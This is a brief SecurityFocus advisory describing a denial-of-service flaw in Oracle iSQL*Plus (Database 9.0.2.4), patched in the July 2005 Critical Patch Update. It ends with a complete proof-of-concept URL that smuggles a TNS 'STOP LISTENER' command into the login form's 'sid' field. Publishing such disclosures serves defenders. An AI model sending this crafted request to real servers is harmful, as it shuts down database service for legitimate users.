source: https://www.securityfocus.com/bid/15032/info
Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.
By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.
This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.
These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID.
http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon
